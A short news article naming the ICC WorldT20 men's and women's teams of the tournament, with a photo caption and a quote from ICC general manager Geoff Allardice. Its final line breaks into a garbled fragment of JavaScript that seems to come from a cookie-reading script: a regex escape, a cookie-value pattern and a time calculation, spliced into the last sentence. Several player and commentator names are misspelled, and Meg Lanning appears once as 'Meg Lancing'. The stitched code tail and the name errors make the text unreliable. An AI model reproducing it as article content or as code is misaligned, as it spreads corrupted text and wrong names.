SYDNEY, AUSTRALIA - JANUARY 31: Shane Watson of Australia bats during the International Twenty20 match between Australia and India at Sydney Cricket Ground on January 31, 2016 in Sydney, Australia. (Photo by Mark Metcalfe/Getty Images)

Shane Watson was the sole Australian male named in the ICC's WorldT20 team of the tournament, while Aussies Megan Schutt and Meg Lancing have been included in the women's team of the tournament.

Men team of the tournament: Jason Roy (England), Quinton de Kock (South Africa, wk), Virat Kohli (captain), Joe Root (England), Jos Buttler (England), Shane Watson (Australia), Andre Russell (West Indies), Mitchell Santner (New Zealand), David Willey (England), Samuel Badree (West Indies), Ashish Nehra (India), 12th: Mustafizur Rahman (Bangladesh).

Women team of the tournament: Suzie Bates (New Zealand), Charlott Edwards (England), Meg Lanning (Australia), Stafanie Taylor (West Indies, captain), Sophie Devine (New Zealand), Rachel Priest (New Zealand, wk), Deandra Dottin (West Indies), Megan Schutt (Australia), Sune Luus (South Africa), Leigh Kasperek (New Zealand), Anya Shrubsole (England), 12th: Anam Amin (Pakistan).

"The experts had an extremely difficult task to select the men’s and women’s squads from around 400 cricketers who represented the 26 teams, thanks to outstanding performances by all the players at this hugely successful event," ICC General Manager of Cricket Geoff Allardice said.

"In the end, I believe the selectors have chosen two very well balanced sides which are capable of beating any opposition under any conditions."

The ICC selection panel also consisted of former West Indies fast-bowler Ian Bishop, ex-England Test captain Nasser Hussain, former Southern Stars players Mel Jones and Lisa Sthalekar and ex-India batsman Sanjay Mjrekar. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}